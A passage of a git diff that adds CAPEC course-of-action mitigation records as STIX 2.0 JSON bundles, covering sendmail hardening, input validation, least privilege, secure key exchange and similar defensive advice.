"2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3a98e579-34f3-4645-b229-ead3e426f738", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-42-1", + "description": "\n Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3b18c283-ce7f-40c6-a077-7202626fc529.json b/capec/course-of-action/course-of-action--3b18c283-ce7f-40c6-a077-7202626fc529.json new file mode 100644 index 0000000000..3cc405523e --- /dev/null +++ b/capec/course-of-action/course-of-action--3b18c283-ce7f-40c6-a077-7202626fc529.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a127d776-b00a-48cc-91a7-3f9951333f91", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3b18c283-ce7f-40c6-a077-7202626fc529", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-14-2", + "description": "Perform input validation for length of buffer inputs.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3b8e47a6-3169-4bd1-a564-746a25883ebf.json b/capec/course-of-action/course-of-action--3b8e47a6-3169-4bd1-a564-746a25883ebf.json new file mode 100644 index 0000000000..712f5d267c --- /dev/null +++ b/capec/course-of-action/course-of-action--3b8e47a6-3169-4bd1-a564-746a25883ebf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b56ad871-92b3-485a-b023-175a3b881e55", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3b8e47a6-3169-4bd1-a564-746a25883ebf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-104-2", + "description": "Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3c6953bd-ae60-4f04-96f3-3baa4a49cceb.json b/capec/course-of-action/course-of-action--3c6953bd-ae60-4f04-96f3-3baa4a49cceb.json new file mode 100644 index 0000000000..419a68b22b --- /dev/null +++ b/capec/course-of-action/course-of-action--3c6953bd-ae60-4f04-96f3-3baa4a49cceb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4897db9d-1cfa-41c3-8b61-ec247cc2ce8b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3c6953bd-ae60-4f04-96f3-3baa4a49cceb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-550-0", + "description": "Limit privileges of user accounts so new service creation can only be performed by authorized administrators.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3cf0b29a-1708-4c94-996e-8606b5832e54.json b/capec/course-of-action/course-of-action--3cf0b29a-1708-4c94-996e-8606b5832e54.json new file mode 100644 index 0000000000..93f066e363 --- /dev/null +++ b/capec/course-of-action/course-of-action--3cf0b29a-1708-4c94-996e-8606b5832e54.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2f68ad1f-24d5-416b-82b0-feb743768cbf", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3cf0b29a-1708-4c94-996e-8606b5832e54", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-94-3", + "description": "Exchange public keys using a secure channel", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3d2cb91d-f2d5-4e7f-a1dd-eb3e1dec3160.json b/capec/course-of-action/course-of-action--3d2cb91d-f2d5-4e7f-a1dd-eb3e1dec3160.json new file mode 100644 index 0000000000..62ec5d351f --- /dev/null +++ b/capec/course-of-action/course-of-action--3d2cb91d-f2d5-4e7f-a1dd-eb3e1dec3160.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--297a319e-bebc-41ff-97ed-491ab432c50d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3d2cb91d-f2d5-4e7f-a1dd-eb3e1dec3160", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-186-0", + "description": "Validate software updates before installing.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3d674156-684a-44c3-b792-cacca604475c.json b/capec/course-of-action/course-of-action--3d674156-684a-44c3-b792-cacca604475c.json new file mode 100644 index 0000000000..35269515da --- /dev/null +++ b/capec/course-of-action/course-of-action--3d674156-684a-44c3-b792-cacca604475c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--73f19abe-e666-41ac-8ef7-e1784199434c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3d674156-684a-44c3-b792-cacca604475c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-464-0", + "description": "\n Design: Browser's design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.\n Design: Safari browser's private browsing mode is currently effective against evercookies.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3e6af105-53da-4ebb-ad68-e251d0305e50.json b/capec/course-of-action/course-of-action--3e6af105-53da-4ebb-ad68-e251d0305e50.json new file mode 100644 index 0000000000..9ecab66dcc --- /dev/null +++ b/capec/course-of-action/course-of-action--3e6af105-53da-4ebb-ad68-e251d0305e50.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8eb108c5-590f-45fa-8e88-b07f24c43b53", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3e6af105-53da-4ebb-ad68-e251d0305e50", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-09-30T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-480-0", + "description": "Ensure virtualization software is current and up-to-date.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785.json b/capec/course-of-action/course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785.json new file mode 100644 index 0000000000..7f2ebb745b --- /dev/null +++ b/capec/course-of-action/course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--da0b2a69-63d3-4866-a0aa-e7c50abfd87e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-236-0", + "description": "Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3f84c0d9-28d1-4682-b953-e1bacd7d8dbf.json b/capec/course-of-action/course-of-action--3f84c0d9-28d1-4682-b953-e1bacd7d8dbf.json new file mode 100644 index 0000000000..622a15477c --- /dev/null +++ b/capec/course-of-action/course-of-action--3f84c0d9-28d1-4682-b953-e1bacd7d8dbf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--79967681-fc78-46b3-8310-f6c13a2c1848", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3f84c0d9-28d1-4682-b953-e1bacd7d8dbf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-536-0", + "description": "Ensure that proper access control is implemented on all systems to prevent unauthorized access to system files and processes.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3fb0274e-adc7-4bec-a0e9-8d6d208ae5e9.json b/capec/course-of-action/course-of-action--3fb0274e-adc7-4bec-a0e9-8d6d208ae5e9.json new file mode 100644 index 0000000000..d283619c62 --- /dev/null +++ b/capec/course-of-action/course-of-action--3fb0274e-adc7-4bec-a0e9-8d6d208ae5e9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ef63b474-b33b-43b1-a30b-899745bb2ab6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3fb0274e-adc7-4bec-a0e9-8d6d208ae5e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-170-7", + "description": "Implementation: Obfuscate database type in Database API's error message.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3fd26460-4bce-4762-8ec0-bf8aeb3955f3.json b/capec/course-of-action/course-of-action--3fd26460-4bce-4762-8ec0-bf8aeb3955f3.json new file mode 100644 index 0000000000..db14423933 --- /dev/null +++ b/capec/course-of-action/course-of-action--3fd26460-4bce-4762-8ec0-bf8aeb3955f3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--83185408-5eeb-46b5-961e-2f7dc7b77540", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3fd26460-4bce-4762-8ec0-bf8aeb3955f3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-21-6", + "description": "Implementation: Verify of authenticity of all session IDs at runtime.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--405d41ea-38ed-499b-85dd-36732f74cbac.json b/capec/course-of-action/course-of-action--405d41ea-38ed-499b-85dd-36732f74cbac.json new file mode 100644 index 0000000000..c8b5e7bf0c --- /dev/null +++ b/capec/course-of-action/course-of-action--405d41ea-38ed-499b-85dd-36732f74cbac.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e00ab5d7-9cc5-4fd6-82dd-a0a36a84a9e4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--405d41ea-38ed-499b-85dd-36732f74cbac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-159-1", + "description": "Implementation: Check the integrity of the dynamically linked libraries before use them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--428b6c2b-e7be-46d9-b273-7e70511208da.json b/capec/course-of-action/course-of-action--428b6c2b-e7be-46d9-b273-7e70511208da.json new file mode 100644 index 0000000000..42bce554f0 --- /dev/null +++ b/capec/course-of-action/course-of-action--428b6c2b-e7be-46d9-b273-7e70511208da.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4b26ea7c-8134-4f56-bf10-b031b1c13302", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--428b6c2b-e7be-46d9-b273-7e70511208da", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-463-0", + "description": "\n Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption\n Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--430d5b07-c34b-41e6-8ca6-ba6b15e2d7bc.json b/capec/course-of-action/course-of-action--430d5b07-c34b-41e6-8ca6-ba6b15e2d7bc.json new file mode 100644 index 0000000000..3facbd68d0 --- /dev/null +++ b/capec/course-of-action/course-of-action--430d5b07-c34b-41e6-8ca6-ba6b15e2d7bc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f3e96b78-b4ed-4d83-a782-9c9a22285a24", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--430d5b07-c34b-41e6-8ca6-ba6b15e2d7bc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-65-1", + "description": "Implementation: Use SSL, SSH, SCP.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--43447d56-2dd9-4251-ac13-dbaf795debbc.json b/capec/course-of-action/course-of-action--43447d56-2dd9-4251-ac13-dbaf795debbc.json new file mode 100644 index 0000000000..7182fc9799 --- /dev/null +++ b/capec/course-of-action/course-of-action--43447d56-2dd9-4251-ac13-dbaf795debbc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--10d39292-586d-4eeb-8a40-5bd952856dc0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--43447d56-2dd9-4251-ac13-dbaf795debbc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-84-0", + "description": "Design: Perform input white list validation on all XML input", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--43f74fd8-92d6-4daa-8165-b99a12cb6248.json b/capec/course-of-action/course-of-action--43f74fd8-92d6-4daa-8165-b99a12cb6248.json new file mode 100644 index 0000000000..2052283c2e --- /dev/null +++ b/capec/course-of-action/course-of-action--43f74fd8-92d6-4daa-8165-b99a12cb6248.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ee858e4d-abdc-455b-b9c2-864e0e402f11", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--43f74fd8-92d6-4daa-8165-b99a12cb6248", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-178-0", + "description": "Implementation: Only allow known URL to be included as remote flash movies in a flash application", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--43f7c68c-4789-41e6-ba7e-dcec87f20649.json b/capec/course-of-action/course-of-action--43f7c68c-4789-41e6-ba7e-dcec87f20649.json new file mode 100644 index 0000000000..5946baf663 --- /dev/null +++ b/capec/course-of-action/course-of-action--43f7c68c-4789-41e6-ba7e-dcec87f20649.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d0c5d8f0-2c1a-4957-b43f-9b0a6a155e86", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--43f7c68c-4789-41e6-ba7e-dcec87f20649", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-551-0", + "description": "Limit privileges of user accounts so service changes can only be performed by authorized administrators. Also monitor any service changes that may occur inadvertently.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1.json b/capec/course-of-action/course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1.json new file mode 100644 index 0000000000..c0d5aef1b1 --- /dev/null +++ b/capec/course-of-action/course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9ee636c5-d9a7-4bff-8dbc-bf33a72e53f0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-17-0", + "description": "Design: Enforce principle of least privilege", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--443002d8-3f49-4db7-9712-ddd66f4ebbad.json b/capec/course-of-action/course-of-action--443002d8-3f49-4db7-9712-ddd66f4ebbad.json new file mode 100644 index 0000000000..3dc4c9b21c --- /dev/null +++ b/capec/course-of-action/course-of-action--443002d8-3f49-4db7-9712-ddd66f4ebbad.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--79630da5-ff5b-4a79-aa1f-c27147b7bb47", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--443002d8-3f49-4db7-9712-ddd66f4ebbad", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-103-0", + "description": "If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--44d3d85f-b98a-4044-870a-30d49c7650fc.json b/capec/course-of-action/course-of-action--44d3d85f-b98a-4044-870a-30d49c7650fc.json new file mode 100644 index 0000000000..fa582f6bfc --- /dev/null +++ b/capec/course-of-action/course-of-action--44d3d85f-b98a-4044-870a-30d49c7650fc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0adfeca5-0a6b-46c6-8eb3-2b6afc03978c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--44d3d85f-b98a-4044-870a-30d49c7650fc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-50-0", + "description": "Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--44e277ab-ef98-46e0-b905-4280ecfb32e7.json b/capec/course-of-action/course-of-action--44e277ab-ef98-46e0-b905-4280ecfb32e7.json new file mode 100644 index 0000000000..081fb5f834 --- /dev/null +++ b/capec/course-of-action/course-of-action--44e277ab-ef98-46e0-b905-4280ecfb32e7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--83b6abd8-dd1a-406f-9d23-bf86a3fbc9ae", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--44e277ab-ef98-46e0-b905-4280ecfb32e7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-101-0", + "description": "Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--45721c66-c4ff-4ca9-b2ba-52361fe49917.json b/capec/course-of-action/course-of-action--45721c66-c4ff-4ca9-b2ba-52361fe49917.json new file mode 100644 index 0000000000..c06ff095b7 --- /dev/null +++ b/capec/course-of-action/course-of-action--45721c66-c4ff-4ca9-b2ba-52361fe49917.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4f4a0e7d-4773-476e-af4e-0307cc28ed08", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--45721c66-c4ff-4ca9-b2ba-52361fe49917", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-13-3", + "description": "Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--45a7c54b-dd25-4f55-bbb2-deae94e43cff.json b/capec/course-of-action/course-of-action--45a7c54b-dd25-4f55-bbb2-deae94e43cff.json new file mode 100644 index 0000000000..95487b1985 --- /dev/null +++ b/capec/course-of-action/course-of-action--45a7c54b-dd25-4f55-bbb2-deae94e43cff.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--79511d47-02b8-4766-b384-0c0af686be48", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--45a7c54b-dd25-4f55-bbb2-deae94e43cff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-27-3", + "description": "Ensure good compartmentalization in the system to provide protected areas that can be trusted.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--45bdb955-8441-4ff0-ab60-682fcc086f9a.json b/capec/course-of-action/course-of-action--45bdb955-8441-4ff0-ab60-682fcc086f9a.json new file mode 100644 index 0000000000..9d44279c72 --- /dev/null +++ b/capec/course-of-action/course-of-action--45bdb955-8441-4ff0-ab60-682fcc086f9a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ab30460b-f299-4aec-8bee-635e2fe39652", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--45bdb955-8441-4ff0-ab60-682fcc086f9a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-169-0", + "description": "Keep patches up to date by installing weekly or daily if possible.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4603ddfb-30b5-4137-826f-1946d59b59e9.json b/capec/course-of-action/course-of-action--4603ddfb-30b5-4137-826f-1946d59b59e9.json new file mode 100644 index 0000000000..479b5a97f7 --- /dev/null +++ b/capec/course-of-action/course-of-action--4603ddfb-30b5-4137-826f-1946d59b59e9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--234bdc66-3cbe-4ab7-9be2-032e3838d6d0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4603ddfb-30b5-4137-826f-1946d59b59e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-83-0", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--46cc2cb0-eede-4b3a-99b8-bb4fc1b2bd54.json b/capec/course-of-action/course-of-action--46cc2cb0-eede-4b3a-99b8-bb4fc1b2bd54.json new file mode 100644 index 0000000000..8d1a10df50 --- /dev/null +++ b/capec/course-of-action/course-of-action--46cc2cb0-eede-4b3a-99b8-bb4fc1b2bd54.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--85aad61f-b25d-474e-9271-15bbf3340a68", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--46cc2cb0-eede-4b3a-99b8-bb4fc1b2bd54", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-285-0", + "description": "Consider configuring firewall rules to block ICMP Echo requests and prevent replies. If not practical, monitor and consider action when a system has fast and a repeated pattern of requests that move incrementally through port numbers.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--47ff9928-47a5-430a-ab40-693332919418.json b/capec/course-of-action/course-of-action--47ff9928-47a5-430a-ab40-693332919418.json new file mode 100644 index 0000000000..42df89c591 --- /dev/null +++ b/capec/course-of-action/course-of-action--47ff9928-47a5-430a-ab40-693332919418.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--13b2635d-4292-4630-8efa-fa01047292cb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--47ff9928-47a5-430a-ab40-693332919418", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-127-2", + "description": "3. Suppressing error messages: using error 403 \"Forbidden\" message exactly like error 404 \"Not Found\" message.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--484680dd-30ae-434b-9cd3-1f30cf495f3b.json b/capec/course-of-action/course-of-action--484680dd-30ae-434b-9cd3-1f30cf495f3b.json new file mode 100644 index 0000000000..a29b863abb --- /dev/null +++ b/capec/course-of-action/course-of-action--484680dd-30ae-434b-9cd3-1f30cf495f3b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3037abd1-ecdd-4c8d-b299-acae97493dc1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--484680dd-30ae-434b-9cd3-1f30cf495f3b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-651-0", + "description": "Be mindful of your surroundings when discussing sensitive information in public areas.", + "object_marking_refs": [ + 